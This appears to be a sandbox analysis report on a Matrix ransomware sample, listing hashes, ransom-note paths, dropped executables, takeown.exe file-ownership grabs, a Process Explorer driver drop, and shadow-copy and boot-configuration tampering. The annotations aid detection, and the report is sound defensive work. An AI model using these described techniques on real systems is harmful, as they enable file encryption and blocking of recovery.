Analysis
-
max time kernel
139s -
max time network
135s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
01-02-2022 07:54
Static task
static1
Behavioral task
behavioral1 (Windows 7 x64; the yara hits further down are tagged behavioral1, so the signature detail on this page comes at least in part from this run — the Windows 10 task's results are not shown separately here)
Sample
242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe
Resource
win10v2004-en-20220113
General
-
Target
242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe
-
Size
1.2MB
-
MD5
a93bd199d34d21cc9102600c6ce782cf
-
SHA1
31b50d84aa1af4f0e76a523382caba476f6e45dc
-
SHA256
242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95
-
SHA512
642e0cacf80a54ffa8f1bdeebb2a9b9449bb062bc331924ff8b6c93853ade68cdbd23928081d7c5da7bce944f5c553b0c4b05bd90fda525f017415bd891534c2
Malware Config
Signatures
-
Matrix Ransomware 64 IoCs
Matrix is a targeted ransomware family that combines information collection with file encryption. In this run the family-level artefact is the ransom note `#README_EMAN#.rtf`, created in every directory the sample walks (Program Files, the Java/VLC/Chrome/Adobe install trees, the user profile and the Firefox profile storage paths listed below); the note filename is therefore the most portable host indicator to hunt on. The 64 rows shown appear to be a display cap (several signatures on this page stop at exactly 64), not the full set of directories touched.
description ioc Process File created C:\Program Files\Google\Chrome\Application\89.0.4389.114\default_apps\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Microsoft Games\Hearts\es-ES\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Microsoft Games\Hearts\fr-FR\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Microsoft Games\Mahjong\de-DE\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\VideoLAN\VLC\locale\gd\LC_MESSAGES\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Java\jdk1.7.0_80\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Users\Admin\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\VideoLAN\VLC\lua\playlist\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Google\Chrome\Application\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program 
Files\VideoLAN\VLC\locale\da\LC_MESSAGES\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\ProgramData\Package Cache\{CB0836EC-B072-368D-82B2-D3470BF95707}v12.0.40660\packages\vcRuntimeMinimum_amd64\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Users\Admin\Favorites\Windows Live\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Microsoft Games\Chess\es-ES\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ryugmcli.default-release\storage\permanent\chrome\idb\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Google\Chrome\Application\SetupMetrics\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Java\jre7\lib\zi\Antarctica\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\#README_EMAN#.rtf 
242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\reader\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Microsoft Games\Multiplayer\Checkers\fr-FR\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\VideoLAN\VLC\locale\wa\LC_MESSAGES\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Microsoft Games\More Games\de-DE\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ryugmcli.default-release\storage\permanent\chrome\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Microsoft Games\Purble Place\es-ES\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User 
Data\Default\Sessions\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Microsoft Games\Chess\ja-JP\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Microsoft Games\Solitaire\es-ES\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Java\jre7\lib\zi\America\Kentucky\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Microsoft Games\Hearts\de-DE\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Microsoft Games\Minesweeper\de-DE\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created 
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ryugmcli.default-release\storage\default\moz-extension+++07d856df-5333-4bf9-8746-58ef2201f846^userContextId=4294967295\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Microsoft Games\Purble Place\de-DE\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Java\jre7\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Java\jre7\lib\fonts\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Users\Public\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\VideoLAN\VLC\locale\mk\LC_MESSAGES\#README_EMAN#.rtf 
242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\VideoLAN\VLC\locale\ckb\LC_MESSAGES\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\VideoLAN\VLC\locale\ka\LC_MESSAGES\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery. No IoC rows are shown for this signature on this page, so the exact shadow-copy deletion command line cannot be confirmed from here; pull it from the process tree before basing a detection on it.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 1320 Process not Found 920 Process not Found — the sandbox could not resolve a process name for PIDs 1320 and 920 (most likely the processes had exited before the tree was captured), so the bcdedit activity is attributed by PID only. PIDs are reused heavily in this run (for example 1240 appears as both NWGGzsKV.exe and tuXIqMZb.exe under "Executes dropped EXE"), so a PID on its own is not a stable identifier; correlate with event timestamps before attributing the bcdedit call to a specific binary. -
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\system32\Drivers\PROCEXP152.SYS tuXIqMZb64.exe — PROCEXP152.SYS is the filename used by the Sysinternals Process Explorer kernel driver. A dropped 64-bit helper writing a driver into System32\Drivers, read together with the "Sets service image path in registry" signature below, is consistent with loading that driver as a kernel service, a known way for ransomware to terminate protected processes and release file handles before encryption. This page does not show the dropped driver's hash or Authenticode signature, so whether it is the genuine signed driver or a modified copy has to be confirmed from the dropped-file artefacts. -
Executes dropped EXE 64 IoCs (the 64-row count looks like a display cap, as for several other signatures on this page). Three dropped binaries are executed: NWGGzsKV.exe once, tuXIqMZb64.exe once (PID 1572 — the helper that drops the PROCEXP152.SYS driver and enumerates drive letters below), and tuXIqMZb.exe dozens of times as short-lived instances whose PIDs are recycled across the listing.
pid Process 1240 NWGGzsKV.exe 1084 tuXIqMZb.exe 2016 tuXIqMZb.exe 1144 tuXIqMZb.exe 1572 tuXIqMZb64.exe 1588 tuXIqMZb.exe 964 tuXIqMZb.exe 1396 tuXIqMZb.exe 588 tuXIqMZb.exe 1324 tuXIqMZb.exe 1556 tuXIqMZb.exe 1240 tuXIqMZb.exe 1252 tuXIqMZb.exe 1100 tuXIqMZb.exe 808 tuXIqMZb.exe 2012 tuXIqMZb.exe 1084 tuXIqMZb.exe 1184 tuXIqMZb.exe 1844 tuXIqMZb.exe 964 tuXIqMZb.exe 960 tuXIqMZb.exe 588 tuXIqMZb.exe 796 tuXIqMZb.exe 1204 tuXIqMZb.exe 1712 tuXIqMZb.exe 804 tuXIqMZb.exe 1776 tuXIqMZb.exe 1624 tuXIqMZb.exe 1512 tuXIqMZb.exe 528 tuXIqMZb.exe 1204 tuXIqMZb.exe 1144 tuXIqMZb.exe 1740 tuXIqMZb.exe 960 tuXIqMZb.exe 1952 tuXIqMZb.exe 1424 tuXIqMZb.exe 324 tuXIqMZb.exe 680 tuXIqMZb.exe 1108 tuXIqMZb.exe 1712 tuXIqMZb.exe 1804 tuXIqMZb.exe 1104 tuXIqMZb.exe 1100 tuXIqMZb.exe 1180 tuXIqMZb.exe 1816 tuXIqMZb.exe 832 tuXIqMZb.exe 1324 tuXIqMZb.exe 1516 tuXIqMZb.exe 1788 tuXIqMZb.exe 1856 tuXIqMZb.exe 1496 tuXIqMZb.exe 2012 tuXIqMZb.exe 692 tuXIqMZb.exe 832 tuXIqMZb.exe 1364 tuXIqMZb.exe 964 tuXIqMZb.exe 1168 tuXIqMZb.exe 1812 tuXIqMZb.exe 900 tuXIqMZb.exe 1172 tuXIqMZb.exe 756 tuXIqMZb.exe 1100 tuXIqMZb.exe 1844 tuXIqMZb.exe 588 tuXIqMZb.exe -
Modifies extensions of user files 2 IoCs
Ransomware generally changes the extension on encrypted files. The two rows below record the original path of each file at the moment it was opened for modification (OutUse.tiff, CopyAdd.tiff); the extension applied after encryption is not captured in this listing, so take the encrypted-file extension from the post-run filesystem diff rather than from here.
description ioc Process File opened for modification C:\Users\Admin\Pictures\OutUse.tiff 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Admin\Pictures\CopyAdd.tiff 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe -
Sets service image path in registry 2 TTPs (no IoC rows are shown on this page; read together with the PROCEXP152.SYS drop above this is consistent with registering that driver as a kernel service — confirm the ImagePath value from the registry trace)
- The yara hits below (the signature heading did not survive extraction) all match the same dropped-file object, 0x00060000000131fe, with sequential suffixes -64 through -148: this is one UPX-packed payload written repeatedly during the run, not dozens of distinct packed binaries. The behavioral1 prefix means these hits are from the Windows 7 task.
resource yara_rule behavioral1/files/0x00060000000131fe-64.dat upx behavioral1/files/0x00060000000131fe-65.dat upx behavioral1/files/0x00060000000131fe-66.dat upx behavioral1/files/0x00060000000131fe-67.dat upx behavioral1/files/0x00060000000131fe-68.dat upx behavioral1/files/0x00060000000131fe-71.dat upx behavioral1/files/0x00060000000131fe-72.dat upx behavioral1/files/0x00060000000131fe-76.dat upx behavioral1/files/0x00060000000131fe-77.dat upx behavioral1/files/0x00060000000131fe-79.dat upx behavioral1/files/0x00060000000131fe-80.dat upx behavioral1/files/0x00060000000131fe-82.dat upx behavioral1/files/0x00060000000131fe-83.dat upx behavioral1/files/0x00060000000131fe-85.dat upx behavioral1/files/0x00060000000131fe-86.dat upx behavioral1/files/0x00060000000131fe-88.dat upx behavioral1/files/0x00060000000131fe-89.dat upx behavioral1/files/0x00060000000131fe-91.dat upx behavioral1/files/0x00060000000131fe-92.dat upx behavioral1/files/0x00060000000131fe-94.dat upx behavioral1/files/0x00060000000131fe-95.dat upx behavioral1/files/0x00060000000131fe-97.dat upx behavioral1/files/0x00060000000131fe-98.dat upx behavioral1/files/0x00060000000131fe-100.dat upx behavioral1/files/0x00060000000131fe-101.dat upx behavioral1/files/0x00060000000131fe-103.dat upx behavioral1/files/0x00060000000131fe-104.dat upx behavioral1/files/0x00060000000131fe-106.dat upx behavioral1/files/0x00060000000131fe-107.dat upx behavioral1/files/0x00060000000131fe-109.dat upx behavioral1/files/0x00060000000131fe-110.dat upx behavioral1/files/0x00060000000131fe-112.dat upx behavioral1/files/0x00060000000131fe-113.dat upx behavioral1/files/0x00060000000131fe-115.dat upx behavioral1/files/0x00060000000131fe-116.dat upx behavioral1/files/0x00060000000131fe-118.dat upx behavioral1/files/0x00060000000131fe-119.dat upx behavioral1/files/0x00060000000131fe-121.dat upx behavioral1/files/0x00060000000131fe-122.dat upx behavioral1/files/0x00060000000131fe-124.dat upx 
behavioral1/files/0x00060000000131fe-125.dat upx behavioral1/files/0x00060000000131fe-127.dat upx behavioral1/files/0x00060000000131fe-128.dat upx behavioral1/files/0x00060000000131fe-130.dat upx behavioral1/files/0x00060000000131fe-131.dat upx behavioral1/files/0x00060000000131fe-133.dat upx behavioral1/files/0x00060000000131fe-134.dat upx behavioral1/files/0x00060000000131fe-136.dat upx behavioral1/files/0x00060000000131fe-137.dat upx behavioral1/files/0x00060000000131fe-139.dat upx behavioral1/files/0x00060000000131fe-140.dat upx behavioral1/files/0x00060000000131fe-142.dat upx behavioral1/files/0x00060000000131fe-143.dat upx behavioral1/files/0x00060000000131fe-145.dat upx behavioral1/files/0x00060000000131fe-146.dat upx behavioral1/files/0x00060000000131fe-148.dat upx -
Loads dropped DLL 64 IoCs
pid Process 1492 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe 1492 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe 1124 cmd.exe 1224 cmd.exe 956 cmd.exe 2016 tuXIqMZb.exe 1356 cmd.exe 1740 cmd.exe 1120 cmd.exe 1624 cmd.exe 1516 cmd.exe 528 cmd.exe 1484 cmd.exe 1136 cmd.exe 2024 cmd.exe 1984 cmd.exe 1648 cmd.exe 1816 cmd.exe 832 cmd.exe 1216 cmd.exe 1104 cmd.exe 1484 cmd.exe 1592 cmd.exe 680 cmd.exe 1180 cmd.exe 1324 cmd.exe 460 cmd.exe 1168 cmd.exe 1736 cmd.exe 2024 cmd.exe 408 cmd.exe 2008 cmd.exe 1824 cmd.exe 1184 cmd.exe 1844 cmd.exe 956 cmd.exe 1512 cmd.exe 1984 cmd.exe 1556 cmd.exe 864 cmd.exe 1900 cmd.exe 1084 cmd.exe 1356 cmd.exe 1752 cmd.exe 528 cmd.exe 2012 cmd.exe 1900 cmd.exe 1504 cmd.exe 1768 cmd.exe 1848 cmd.exe 1616 cmd.exe 900 cmd.exe 1648 cmd.exe 324 cmd.exe 848 cmd.exe 1984 cmd.exe 1768 cmd.exe 1588 cmd.exe 1688 cmd.exe 1744 cmd.exe 680 cmd.exe 1196 cmd.exe 1952 cmd.exe 1740 cmd.exe -
Modifies file permissions 1 TTPs 64 IoCs — nearly every row below is takeown.exe, i.e. the sample takes ownership of files it cannot otherwise write (the Program Files application trees opened for modification further down) before encrypting them; the "Process not Found" rows are again takeown instances that exited before the sandbox resolved their names. A burst of takeown.exe processes launched under a non-installer parent is a practical detection hook for this stage.
pid Process 1740 takeown.exe 996 takeown.exe 904 takeown.exe 1844 takeown.exe 1960 Process not Found 1444 takeown.exe 1052 takeown.exe 1108 takeown.exe 2044 Process not Found 1632 Process not Found 1320 Process not Found 2008 takeown.exe 1204 takeown.exe 752 takeown.exe 1188 Process not Found 1516 takeown.exe 1776 Process not Found 900 Process not Found 1000 takeown.exe 1516 takeown.exe 1168 takeown.exe 796 Process not Found 1740 takeown.exe 980 takeown.exe 1960 Process not Found 1736 takeown.exe 1624 takeown.exe 1168 takeown.exe 1960 Process not Found 1844 takeown.exe 1564 takeown.exe 1736 Process not Found 1620 takeown.exe 1564 Process not Found 1364 takeown.exe 1516 takeown.exe 980 Process not Found 2008 Process not Found 1588 takeown.exe 772 takeown.exe 1712 takeown.exe 1204 takeown.exe 1424 takeown.exe 1104 takeown.exe 1984 Process not Found 680 takeown.exe 1108 takeown.exe 1740 takeown.exe 2008 takeown.exe 1656 Process not Found 1900 takeown.exe 552 Process not Found 952 Process not Found 1724 takeown.exe 1108 takeown.exe 920 Process not Found 1984 takeown.exe 1620 takeown.exe 796 takeown.exe 1624 takeown.exe 1564 Process not Found 1588 takeown.exe 1424 takeown.exe 2044 takeown.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc. No IoC rows are shown for this signature on this page. Note that the encryption walk itself descends into the Firefox profile (ransom notes are created under AppData\Roaming\Mozilla\Firefox\Profiles\...\storage above), so this hit may have been triggered by that traversal rather than by deliberate credential theft; confirm from the file-read trace which profile files were actually read before treating this as exfiltration.
-
Drops desktop.ini file(s) 41 IoCs — note that every row below is "File opened for modification" of an existing desktop.ini in standard profile and Program Files folders, not creation of new ones; this is consistent with the encryption pass touching every file in those folders rather than a separate persistence or folder-customisation step.
description ioc Process File opened for modification C:\Program Files\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Microsoft Games\Chess\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Microsoft Games\Mahjong\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Admin\Favorites\Links for United States\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Public\Recorded TV\Sample Media\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Admin\Searches\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Public\Pictures\Sample Pictures\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Public\Videos\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\H2R8HLJC\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Public\Libraries\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Admin\Links\desktop.ini 
242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Admin\Documents\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Microsoft Games\FreeCell\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Microsoft Games\Purble Place\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Admin\Videos\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\E16QEJ8K\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Public\Music\Sample Music\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Public\Videos\Sample Videos\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Microsoft Games\Solitaire\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Microsoft Games\SpiderSolitaire\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Public\Downloads\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe 
